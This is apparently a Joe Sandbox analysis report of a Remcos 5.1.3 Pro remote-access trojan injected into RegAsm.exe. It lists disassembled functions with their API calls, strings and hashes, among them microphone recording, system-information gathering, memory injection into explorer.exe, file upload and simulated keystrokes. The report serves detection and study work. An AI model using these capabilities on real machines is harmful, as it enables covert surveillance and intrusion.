                                                                                                                                  Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                  • API String ID: 1462127192-2001430897
                                                                                                                                  • Opcode ID: 07e73add978e97c943bb7c5b87a5eb9b1a3ba5c22b6ee9c8c6a83aa858ac443c
                                                                                                                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                                                                  • Opcode Fuzzy Hash: 07e73add978e97c943bb7c5b87a5eb9b1a3ba5c22b6ee9c8c6a83aa858ac443c
                                                                                                                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                                                  Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                  • API String ID: 2050909247-4242073005
                                                                                                                                  • Opcode ID: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                                                                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                                                                  • Opcode Fuzzy Hash: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                                                                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                                                                  Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _strftime.LIBCMT ref: 00401D50
                                                                                                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                                                  • API String ID: 3809562944-243156785
                                                                                                                                  • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                                                                  • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                                                                  Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                                  • int.LIBCPMT ref: 00410EBC
                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                  • String ID: ,kG$0kG
                                                                                                                                  • API String ID: 3815856325-2015055088
                                                                                                                                  • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                                                                  • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                                                                  Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                                  • waveInStart.WINMM ref: 00401CFE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                  • String ID: 8)3$dMG$|MG
                                                                                                                                  • API String ID: 1356121797-3655211567
                                                                                                                                  • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                                                                  • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                                  Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                  • GetMessageA.USER32 ref: 0041D591
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                  • String ID: Remcos
                                                                                                                                  • API String ID: 1970332568-165870891
                                                                                                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                                                  Function 0041CE2C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 48memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Console$Window$AllocOutputShow
                                                                                                                                  • String ID: Remcos v$5.1.3 Pro$CONOUT$$P2
                                                                                                                                  • API String ID: 4067487056-3459370436
                                                                                                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                                                                  Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                  • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                  Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                                                                  • __freea.LIBCMT ref: 00454083
                                                                                                                                  • __freea.LIBCMT ref: 0045408F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 201697637-0
                                                                                                                                  • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                                  • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                                  Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                  • _free.LIBCMT ref: 00445515
                                                                                                                                  • _free.LIBCMT ref: 0044552E
                                                                                                                                  • _free.LIBCMT ref: 00445560
                                                                                                                                  • _free.LIBCMT ref: 00445569
                                                                                                                                  • _free.LIBCMT ref: 00445575
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                  • String ID: C
                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                  • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                  • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                  Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: tcp$udp
                                                                                                                                  • API String ID: 0-3725065008
                                                                                                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                  Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                  • String ID: PkG$XMG$NG$NG
                                                                                                                                  • API String ID: 1649129571-3151166067
                                                                                                                                  • Opcode ID: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                                                                                                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                                  • Opcode Fuzzy Hash: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                                                                                                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                                                  Function 10003370 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                  • String ID: csm$fYM/
                                                                                                                                  • API String ID: 1170836740-2417044826
                                                                                                                                  • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                  • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                  Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                                                                  • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                  • String ID: .part
                                                                                                                                  • API String ID: 1303771098-3499674018
                                                                                                                                  • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                                  • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                                  Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendInput.USER32 ref: 00419A25
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
